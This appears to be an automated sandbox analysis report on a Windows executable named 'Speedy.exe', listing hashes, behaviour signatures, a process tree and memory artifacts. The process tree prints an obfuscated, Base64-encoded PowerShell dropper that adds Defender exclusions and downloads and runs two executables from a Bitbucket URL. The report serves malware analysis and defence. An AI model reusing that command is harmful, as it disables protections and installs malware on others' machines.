Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    21-07-2024 19:24

General

  • Target

    Speedy.exe

  • Size

    160KB

  • MD5

    7b9610cdb99b9973810e3e25e2548ba9

  • SHA1

    776ecee620560f31d35fbd9894737e7b4133d29a

  • SHA256

    1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096

  • SHA512

    29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660

  • SSDEEP

    3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Speedy.exe
    "C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbAB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAANAAwADEAOgAgAE4AbwAgAFYAUABTACAAaQBzACAAYQBsAGwAbwB3AGUAZAAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHgAeQAjAD4AOwAiADsAPAAjAG4AdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQBpAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBmAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AawBwAHUAbgB0AGwAdQBjAC4AZQB4AGUAJwAsACAAPAAjAHgAaABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBsAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApACkAPAAjAGUAdgB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AdgBvAGwAdQBuAGUALgBlAHgAZQAnACwAIAA8ACMAcABsAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHYAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGIAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBUAG8AcgAuAGUAeABlACcAKQApADwAIwBkAGwAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB0AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApADwAIwB3AGMAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAHEAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB3AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVABvAHIALgBlAHgAZQAnACkAPAAjAHUAaQBzACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2364
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1892

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    c3e23a674037974ce33009b2973f2c23

    SHA1

    24c7a1c0d5b2ea895d56b52129ab4ca6f0e5b21e

    SHA256

    ec3f82cbe08fbafcb66bb15a64c5c270eb097b8d42dbd7b720509451aa556507

    SHA512

    ba1782aa7c2ec142000a7675ff4cf92481c9b6cd5e7a79578d987fde0b7febc7ba36b63e8811fe0031d95d9dc5dde9753b347a5b7436192ac1ba3b802039e296

  • memory/2364-6-0x0000000002C20000-0x0000000002CA0000-memory.dmp

    Filesize

    512KB

  • memory/2364-7-0x000000001B780000-0x000000001BA62000-memory.dmp

    Filesize

    2.9MB

  • memory/2364-8-0x0000000001D80000-0x0000000001D88000-memory.dmp

    Filesize

    32KB

  • memory/2364-14-0x0000000002C20000-0x0000000002CA0000-memory.dmp

    Filesize

    512KB

  • memory/3032-0-0x000007FEF5B83000-0x000007FEF5B84000-memory.dmp

    Filesize

    4KB

  • memory/3032-1-0x0000000001000000-0x000000000102E000-memory.dmp

    Filesize

    184KB